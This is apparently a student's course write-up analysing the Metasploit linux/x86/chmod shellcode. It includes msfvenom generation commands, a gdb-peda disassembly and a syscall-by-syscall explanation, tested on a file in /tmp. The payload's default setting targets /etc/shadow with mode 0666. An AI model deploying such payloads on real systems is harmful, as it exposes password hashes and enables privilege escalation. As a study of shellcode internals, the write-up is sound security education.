SLAE Assignment 5.3 - Msfvenom linux/x86/chmod shellcode Analysis

    Student SLAE - 891

    Assignment 5.3:

    Our Goal:

    Take up at least 3 linux/x86 shellcodes using Msfpayload (now Msfvenom)

    • Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
    • Present your analysis

    Hello everybody,

    Here we are for the last shellcode of the msfvenom serie. We will use this time the linux/x86/chmod shellcode and will analyse it thanks to GDB:

    # msfvenom -p linux/x86/chmod --payload-options
    Options for payload/linux/x86/chmod:
           Name: Linux Chmod
           Module: payload/linux/x86/chmod
           Platform: Linux
           Arch: x86
           Needs Admin: No
           Total size: 36
           Rank: Normal
    Provided by:
        kris katterjohn <[email protected]>
    Basic options:
    Name  Current          Setting     Required  Description
    ----  ---------------  --------    -----------
    FILE  /etc/shadow      yes         Filename to chmod
    MODE  0666             yes         File mode (octal)
      Runs chmod on specified file with specified mode

    Let’s generate the ELF:

    # msfvenom -p linux/x86/chmod FILE=/tmp/slae.txt -f elf -o chmod_slae
    No platform was selected, choosing Msf::Module::Platform::Linux from the payload
    No Arch selected, selecting Arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 38 bytes
    Final size of elf file: 122 bytes
    Saved as: chmod_slae
    # ls -l /tmp/slae.txt 
    -r--r--r-- 1 root root 0 avril 22 04:54 /tmp/slae.txt
    # chmod +x ./chmod_slae && ./chmod_slae
    # ls -l /tmp/slae.txt 
    -rw-rw-rw- 1 root root 0 avril 22 04:54 /tmp/slae.txt

    Perfect we see that our file /tmp/slae.txt has now the octal right 666 standing for rw-rw-rw-. Let’s have a look in gdb:

    # readelf -h ./chmod_slae
    Adresse du point d'entrée:    0x8048054 
    # gdb -q ./chmod_slae 
    Reading symbols from ./chmod_slae...(no debugging symbols found)...done.
    gdb-peda$ br *0x8048054
    Breakpoint 1 at 0x8048054
    gdb-peda$ run
    gdb-peda$ disas $eip,+38
    Dump of assembler code from 0x8048054 to 0x804807a:
    => 0x08048054:	cdq    
       0x08048055:	push   0xf
       0x08048057:	pop    eax
       0x08048058:	push   edx
       0x08048059:	call   0x804806c
       0x0804805e:	das    
       0x0804805f:	je     0x80480ce
       0x08048061:	jo     0x8048092
       0x08048063:	jae    0x80480d1
       0x08048065:	popa   
       0x08048066:	gs cs je 0x80480e2
       0x0804806a:	je     0x804806c
       0x0804806c:	pop    ebx
       0x0804806d:	push   0x1b6
       0x08048072:	pop    ecx
       0x08048073:	int    0x80
       0x08048075:	push   0x1
       0x08048077:	pop    eax
       0x08048078:	int    0x80
    End of assembler dump.

    Let’s add some breakpoints on interesting opcodes:

    gdb-peda$ br *0x0804806c
    Breakpoint 2 at 0x804806c
    gdb-peda$ br *0x08048073
    Breakpoint 3 at 0x8048073
    gdb-peda$ br *0x08048078
    Breakpoint 4 at 0x8048078
    gdb-peda$ c
    EAX: 0xf 
    EBX: 0x0 
    ECX: 0x0 
    EDX: 0x0 
    ESI: 0x0 
    EDI: 0x0 
    EBP: 0x0 
    ESP: 0xbffff2c8 --> 0x804805e ("/tmp/slae.txt")
    EIP: 0x804806c --> 0x1b6685b
    EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
       0x8048065:	popa   
       0x8048066:	gs cs je 0x80480e2
       0x804806a:	je     0x804806c
    => 0x804806c:	pop    ebx
       0x804806d:	push   0x1b6
       0x8048072:	pop    ecx
       0x8048073:	int    0x80
       0x8048075:	push   0x1
    0000| 0xbffff2c8 --> 0x804805e ("/tmp/slae.txt")
    0004| 0xbffff2cc --> 0x0 
    0008| 0xbffff2d0 --> 0x1 
    0012| 0xbffff2d4 --> 0xbffff478 ("/root/Documents/pentest/certs/slae/exam/assignment5.3/chmod_slae")
    0016| 0xbffff2d8 --> 0x0 
    0020| 0xbffff2dc --> 0xbffff4b9 ("XDG_VTNR=2")
    0024| 0xbffff2e0 --> 0xbffff4c4 ("XDG_SESSION_ID=2")
    0028| 0xbffff2e4 --> 0xbffff4d5 ("SSH_AGENT_PID=1067")
    Legend: code, data, rodata, value

    Notice that we are using gdb-peda. Thanks to the call technique the next instruction pop ebx will pop the address of the string /tmp/slae in the EBX register.

    So we will have:

    EAX: 0xf 
    EBX: 0x804805e (/tmp/slae.txt) 

    Finally if we stop at the address 0x8048073 just before our syscall:

    EAX: 0xf 
    EBX: 0x804805e ("/tmp/slae.txt")
    ECX: 0x1b6 

    We will call int chmod(const char *pathname, mode_t mode);. The second argument 0x1b6 is 666 in octal:

    # printf "%o\n" 0x1b6

    Let’s go to the following breakpoint:

    EAX: 0x1 
    EBX: 0x804805e (/tmp/slae.txt) 

    We will call void _exit(int status);, the exit status is not important in a shellcode execution context, so we won’t add an opcode to set EBX.

    Finally, our shellcode will change the permissions of our file:

    gdb-peda$ n
    [Inferior 1 (process 24785) exited with code 0136]
    Warning: not running or target is remote

    So we just finished our msfvenom shellcodes serie. Soon we will deal with polymorphic shellcodes and crypters.
    Hope you enjoyed this post.